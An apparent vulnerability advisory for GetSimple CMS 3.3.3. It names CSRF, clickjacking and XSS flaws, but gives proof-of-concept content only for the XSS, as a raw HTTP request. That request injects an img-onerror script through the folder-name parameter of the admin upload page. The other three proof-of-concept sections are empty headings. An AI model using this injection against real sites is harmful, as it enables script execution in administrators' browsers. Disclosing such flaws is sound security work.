#Affected Vendor: http://get-simple.info/ #Date: 23/09/2014 #Discovered by: JoeV #Type of vulnerability: CSRF, Click-jacking, DOM based XSS and XSS #Tested on: Windows 7 #Version : 3.3.3 #Description: Get Simple CMS v 3.3.3 is susceptible to multiple vulnerabilities such as CSRF, Click-jacking, DOM based XSS and XSS. Proof of Concept (PoC): --------------------------- 1) CSRF --------- 2) Click-jacking ------------------ 3) DOM based XSS (Themes) ----------------------------------

4) XSS on Files (Create Folder) ------------------------------------ GET /admin/upload.php?path=&nonce=538380793c11d2f81601a05eee834cd1d2c38fee&newfolder=%22%3E%3Cimg+src%3Dd+onerror%3Dconfirm(%2Fxss%2F)%3B%3E HTTP/1.1 Host: localhost Proxy-Connection: keep-alive Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36 Referer: http://localhost/admin/upload.php Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Cookie: iconSize=16x16; hudson_auto_refresh=true; /modules/system/admin.php_SystemAutotasks_sortsel=sat_name; /modules/system/admin.php_SystemAutotasks_ordersel=ASC; /modules/system/admin.php_limitsel=15; /modules/system/admin.php_SystemAutotasks_filtersel=default; cookies_on=1; __atuvc=2%7C39; 2c83ccac291e27547de553cb57bc48530615cd78=22dd15ba66e19f2d0ccb10eb046cf7c0ad0d6b14; GS_ADMIN_USERNAME=admin If-Modified-Since: Tue, 23 Sep 2014 15:00:08 GMT